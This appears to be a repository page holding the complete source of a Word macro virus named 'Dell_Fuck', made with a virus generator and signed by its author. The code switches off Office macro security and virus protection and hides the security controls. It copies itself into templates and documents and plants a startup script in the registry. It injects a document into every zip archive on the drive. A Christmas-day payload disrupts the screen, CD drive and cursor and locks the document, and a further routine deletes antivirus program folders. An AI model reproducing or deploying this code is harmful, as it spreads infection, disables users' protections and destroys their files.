-
Notifications
You must be signed in to change notification settings - Fork 1
/
Dell_Fuck.vbs
269 lines (267 loc) · 11.9 KB
/
Dell_Fuck.vbs
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
Attribute VB_Name = "Dell_Fuck"
' Virus Name : Dell_Fuck
' Virus Author : LK1337
' Virus version : 1.0.0.0
' Greets To : TrojoFuck and WiPet
Private Declare Function SetSysColors Lib "user32" (ByVal nChanges As Long, lpSysColor As Long, lpColorValues As Long) As Long
Private Declare Function mciSendString Lib "winmm.dll" Alias "mciSendStringA" (ByVal lpstrCommand As String, ByVal lpstrReturnString As String, ByVal uReturnLength As Long, ByVal hwndCallback As Long) As Long
Private Declare Function SetCursorPos Lib "USER32" (ByVal x As Long, ByVal y As Long) As Long
Private Declare Function GetCursorPos Lib "USER32" (lpPoint As Tr528) As Long
Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
Private Type Tr528
Ov678 As Long
Ff430 As Long
End Type
Sub AutoOpen()
RwFy12187 = DwJwCjFh & NmVw4545 & Int(Rnd * 246)
Call AGF6251
NwAo3820 = SkVpTyRr & HrBe14612 & Int(Rnd * 9210)
HtGqTpHh = CrFk12048 & InRj6400
End Sub
KzEnCzKf = RvPs8870 & OnAu12378
Sub AutoClose()
OfBsTvNg = DvKh14191 & AnAg10185
QfHv13294 = GwLwTvIw & PoBe8129 & QrAxNiMf & SoNm9027
Call AGF6251
SmRh6116 = GpTgEzTy & IsGy5804 & UrOmPeEu & ElUp11225
End Sub
Sub FileSave()
AkKf9425 = DjGiMnAi & QzSi17486 & HrDlMlDn & GxAg12229
LvDg9818 = AiGvCpNw & QtVl13664 & Int(Rnd * 3700)
Call AGF6251
End Sub
IrTj7688 = AyEhDkCi & GfGw15255 & Int(Rnd * 6873)
Sub FileSaveAs()
UlQh9699 = VeQqMuAo & CgSv12430 & SnIxPxKj & FrUi12454
Call AGF6251
GlJuVwNj = QuGy14360 & NrVj8254
End Sub
LgJn15199 = SgLwOvTq & QvDw13141 & GkNgShTq & IfMn10335
Sub AGF6251()
RhNk14495 = FmGlHqNk & NlUf14805 & SgEiMeBo & DfLh15486
On Error Resume Next
PxFz8604 = KlMnPnCr & UyKy7917 & Int(Rnd * 6725)
With Options
.ConfirmConversions = False
.VirusProtection = False
.SaveNormalPrompt = False
End With
JzSwMsNe = AoOe3944 & QlPi9194
Select Case Application.Version
Case "10.0"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "Level") = 1&
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "AccessVBOM") = 1&
CommandBars("Macro").Controls("Security...").Enabled = False
Case "9.0"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
CommandBars("Macro").Controls("Security...").Enabled = False
End Select
WordBasic.DisableAutoMacros 0
DuHjMpBp = UfJp10572 & UvFl12665
KeyBindings.Add KeyCode:=BuildKeyCode(wdKeyAlt, wdKeyF11), KeyCategory:=0, Command:=" "
CwRlDxTh = LoDm9670 & PnNf13841
AtLwDuDs = MtDe10899 & TyTf6583
FhKf7104 = JmKxJvJk & RhFr8153 & RzFkChEe & VsLn1644
ActiveDocument.ReadOnlyRecommended = False
If Left(ActiveDocument.Name, 8) = "Document" Then Exit Sub
Set JDQ1813 = NormalTemplate.VBProject.VBComponents
Set QLT2311 = ActiveDocument.VBProject.VBComponents
PLM6639 = "C:\Dell_Fuck.FOV"
OeEm5438 = UoMkPlBj & CyKw5611 & Int(Rnd * 5187)
If JDQ1813.Item("Dell_Fuck").CodeModule.CountOfLines < 5 Then
FjLo14449 = SrVqKoLy & PnLh13259 & Int(Rnd * 4920)
QLT2311("Dell_Fuck").Export PLM6639
IjFvNxGf = RkIq6885 & JmKn4442
JDQ1813.Import PLM6639
LiMx9473 = LeOyJpBr & OxFg9033 & Int(Rnd * 7756)
End If
If QLT2311.Item("Dell_Fuck").CodeModule.CountOfLines < 5 Then
JDQ1813("Dell_Fuck").Export PLM6639
QLT2311.Import PLM6639
ActiveDocument.Save
End If
AeIi8318 = VjEiRwTp & OyQz3902 & Int(Rnd * 2583)
Kill PLM6639
NfKn15710 = RjAsQrBp & KfKo10554 & Int(Rnd * 6340)
MzHz11437 = ClTqVxTo & MeIh14662 & Int(Rnd * 5546)
With Dialogs(wdDialogFileSummaryInfo)
.Author = "FUCK DELL"
VwIzGpRy = QpNu9095 & KiOo8932
.Title = "FUCK DELL"
.Subject = "WiPet 4 Life!"
OsOkByPz = BhMu14100 & CkHu15041
.Comments = "WiPet and LK1337"
.Keywords = "FUCK DELL"
TqSe808 = DeTpHlCi & DiUe6016 & Int(Rnd * 677)
.Execute
End With
If Left(ActiveDocument.Name, 8) <> "Document" And ActiveDocument.Saved = False Then ActiveDocument.Save
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion", "RegisteredOwner") = "FUCK DELL"
HuVs11450 = QsSnTiCk & KxBp3734 & Int(Rnd * 1709)
Application.UserName = "FUCK DELL"
PuDgVmQv = OiSr8847 & EfHp7940
QLT2311("Dell_Fuck").Export "C:\Windows\Dell_Fuck.drv"
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "WVE") = "C:\Windows\Dell_Fuck.vbs"
Open "C:\Windows\Dell_Fuck.vbs" For Output As #1
Print #1, "' Dell_Fuck.vbs for Dell_Fuck Virus by LK1337"
Print #1, "On Error Resume Next"
Print #1, "Dim WSHShell"
Print #1, "Set WSHShell = WScript.CreateObject(""WScript.Shell"")"
Print #1, "WSHShell.RegWrite ""HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security\AccessVBOM"", 1, ""REG_DWORD"""
Print #1, "WSHShell.RegWrite ""HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security\Level"", 1, ""REG_DWORD"""
Print #1, "WSHShell.RegWrite ""HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security\Level"", 1, ""REG_DWORD"""
Print #1, "Set Backup = WScript.CreateObject(""Word.Application"")"
Print #1, "Backup.Options.VirusProtection = False"
Print #1, "Backup.Options.SaveNormalPrompt = False"
Print #1, "Backup.NormalTemplate.VBProject.VBComponents.Remove Backup.NormalTemplate.VBProject.VBComponents(""Dell_Fuck"")"
Print #1, "Backup.NormalTemplate.Save"
Print #1, "Backup.NormalTemplate.VBProject.VBComponents.Import (""C:\Windows\Dell_Fuck.drv"")"
Print #1, "Backup.Application.Quit"
Close #1
RpQq12949 = RsTeDwSr & MsGw13496 & VtFtUlNi & VuIp9275
LoHzQtQk = CuBn9681 & VrVs6060
DwDu11211 = OlQzRtVr & CuQo11265 & Int(Rnd * 2968)
Call VEB9548
UeBuLyCx = HzRy11316 & RiEg5643
UoLgHwAf = JrOl11406 & PmSo10786
IxHzPiMi = JnJh9197 & NpOn16295
If Month(Now) = 12 And Day(Now) = 25 Then Call EPQ522
End Sub
Sub EPQ522()
On Error Resume Next
FqRv19829 = OpEsAvSs & PqPs12736 & Int(Rnd * 9862)
a = SetSysColors(1, 1, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
a = SetSysColors(1, 2, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
a = SetSysColors(1, 3, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
a = SetSysColors(1, 4, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
a = SetSysColors(1, 5, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
a = SetSysColors(1, 6, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
a = SetSysColors(1, 7, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
a = SetSysColors(1, 8, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
a = SetSysColors(1, 9, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
a = SetSysColors(1, 10, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
a = SetSysColors(1, 11, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
a = SetSysColors(1, 12, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
a = SetSysColors(1, 13, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
a = SetSysColors(1, 14, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
a = SetSysColors(1, 15, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
a = SetSysColors(1, 16, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
a = SetSysColors(1, 17, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
a = SetSysColors(1, 18, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
a = SetSysColors(1, 19, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
a = SetSysColors(1, 20, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
a = SetSysColors(1, 21, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
a = SetSysColors(1, 22, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
a = SetSysColors(1, 23, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
a = SetSysColors(1, 24, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
a = SetSysColors(1, 25, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
a = SetSysColors(1, 26, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
a = SetSysColors(1, 27, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
Do
PiIj7057 = ArDgMtIy & TjSt6608 & Int(Rnd * 1163)
mciSendString "set cd door open", 0, 0, 0: mciSendString "set cd door closed", 0, 0, 0: mciSendString "set cd time format tmsf wait", 0, 0, 0: mciSendString "open cdaudio alias cd wait shareable", 0, 0, 0
QxJsVpLk = NyRy7618 & AqCq5199
EnLiVyMw = MwAg8531 & KgAn16242
Loop
MsgBox "I FUCKING HATE DELL!!", vbExclamation
Assistant.Visible = True
OvNiLuNn = FqMn7945 & VtQj9115
With Assistant.NewBalloon
.Icon = msoIconAlert
UqViUiTt = AeIi10504 & KeFh11960
.Text = "FUCK DELL!!"
.Heading = "Dell_Fuck"
.Show
EmMy8212 = MmNwDmLz & TjGw1740 & Int(Rnd * 8017)
End With
ActiveDocument.Protect Password:="WiPet4Life", NoReset:=False, Type:= _
wdAllowOnlyComments
ActiveDocument.Save
Dim Ne879 As Long
Dim Jr438 As Long
OtBg6984 = IiVrTfSy & DrBg6920 & Int(Rnd * 749)
Dim Hn438 As Tr528
Do
GetCursorPos Hn438
Ne879 = Rnd(2)
SeJw13805 = FzAsVrMv & IuIs15541 & Int(Rnd * 6222)
If Ne879 = 0 Then Ne879 = -5 Else Ne879 = 5
Jr438 = Rnd(2)
If Jr438 = 0 Then Jr438 = -5 Else Jr438 = 5
SetCursorPos Hn438.Ov678 + Ne879, Hn438.Ff430 + Jr438
Sleep 2
NhLx13056 = EpKmRkEh & HlQe5661 & Int(Rnd * 7391)
DoEvents
Loop
Randomize: For Pictures = 1 To (Int(Rnd * 70))
BoRz17972 = KeMmCxIk & MgAv9270 & Int(Rnd * 1015)
ActiveDocument.Shapes.AddShape(Int(Rnd * 120), Int(Rnd * 200), Int(Rnd * 500), Int(Rnd * 500), Int(Rnd * 500)).Select
TvBx8842 = MtNxRzGk & GfQz10386 & Int(Rnd * 2887)
Selection.ShapeRange.Fill.ForeColor.RGB = RGB(Int(Rnd * 255), Int(Rnd * 255), Int(Rnd * 255))
Selection.ShapeRange.Fill.Visible = msoTrue
GfUkNvMq = SqIi8114 & MwQm7183
Selection.ShapeRange.Fill.Solid: Next Pictures
StarWidth = 25: StarHeight = 25
For i = 1 To 10
TopPos = Rnd() * (ActiveWindow.UsableHeight - StarHeight): LeftPos = Rnd() * (ActiveWindow.UsableWidth - StarWidth)
Set NewStar = ActiveDocument.Shapes.AddShape _
(msoShape4pointStar, LeftPos, TopPos, StarWidth, StarHeight)
NewStar.Fill.Visible = msoTrue: NewStar.Fill.Solid
NewStar.Fill.ForeColor.RGB = RGB(Int(Rnd * 255), Int(Rnd * 255), Int(Rnd * 255))
Oldtimer1 = Timer: While (Timer < Oldtimer1 + 1): Wend
DoEvents
Next i
Oldtimer2 = Timer: While (Timer < Oldtimer2 + 2): Wend
Set myShapes = ActiveDocument.Shapes
For Each shp In myShapes
If Left(shp.Name, 9) = "AutoShape" Then
shp.Delete
Oldtimer3 = Timer: While (Timer < Oldtimer3 + 1): Wend
End If
Next
ActiveDocument.Shapes().Visible = True
Do
NoRi18437 = AmPnHrKx & HoUp15136 & KjMmDhDh & MrIi1812
CommandBars("Menu Bar").Controls(10).Copy
DiIe6592 = KjAfHzFl & CxUz10741 & Int(Rnd * 6171)
Loop
End Sub
Sub VEB9548()
On Error Resume Next
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "InfectWinZip") <> "True" Then
GVP866 = Dir("C:\Windows\Confidential.doc")
If GVP866 = "" Then ActiveDocument.SaveAs "C:\Windows\Confidential.doc"
If GVP866 <> "" Then
WinZipPath = Application.System.PrivateProfileString("", _
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows" & _
"\CurrentVersion\App Paths\winzip32.exe", "")
BoOy11045 = EmUzIwGx & LkFf8485 & KfOoPlGt & IhJp7968
With Application.FileSearch
.LookIn = "C:\"
.SearchSubFolders = True
.FileName = "*.zip"
.Execute
End With
NyRhTtTr = EeKv15419 & EyFg12927
For f = 1 To Application.FileSearch.FoundFiles.Count
RUN4002 = Application.FileSearch.FoundFiles(f)
VBA.Shell WinZipPath & " -a -r " & RUN4002 _
& Chr(32) & "C:\Windows\Confidential.doc", vbHide
Next
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "InfectWinZip") = "True"
End If
End If
End Sub
Sub RQP4933()
AmNp13698 = RgJkHhEj & OfUp13378 & Int(Rnd * 8423)
PvCp4331 = RnJlUuVq & AxIs2027 & Int(Rnd * 3294)
On Error Resume Next
Kill ("C:\AntiViral Toolkit Pro\*.*"): Kill ("C:\Program Files\AntiViral Toolkit Pro\*.*")
Kill ("C:\DrWeb for Windows\*.*"): ("C:\Program Files\DrWeb for Windows\*.*")
Kill ("C:\InoculateIT PE\*.*"): Kill ("C:\Program Files\InoculateIT PE\*.*")
Kill ("C:\MCAFEE\VIRUSSCAN\*.*"): Kill ("C:\MCAFEE\VIRUSSCAN95\*.*"): Kill ("C:\Program Files\MCAFEE\VIRUSSCAN\*.*"): Kill ("C:\Program Files\MCAFEE\VIRUSSCAN95\*.*")
Kill ("C:\Norton Antivirus\*.*"): Kill ("C:\Program Files\Norton Antivirus\*.*")
Kill ("C:\Trend PC-cillin 2000\*.*"): Kill ("C:\Program Files\Norton Antivirus\*.*")
Kill ("C:\Sophos SWEEP\*.*"): Kill ("C:\Program Files\Trend PC-cillin 2000\*.*")
End Sub
' Another Virus Created By The WalruS Virus Generator (WVE) Version 1.23 Final Version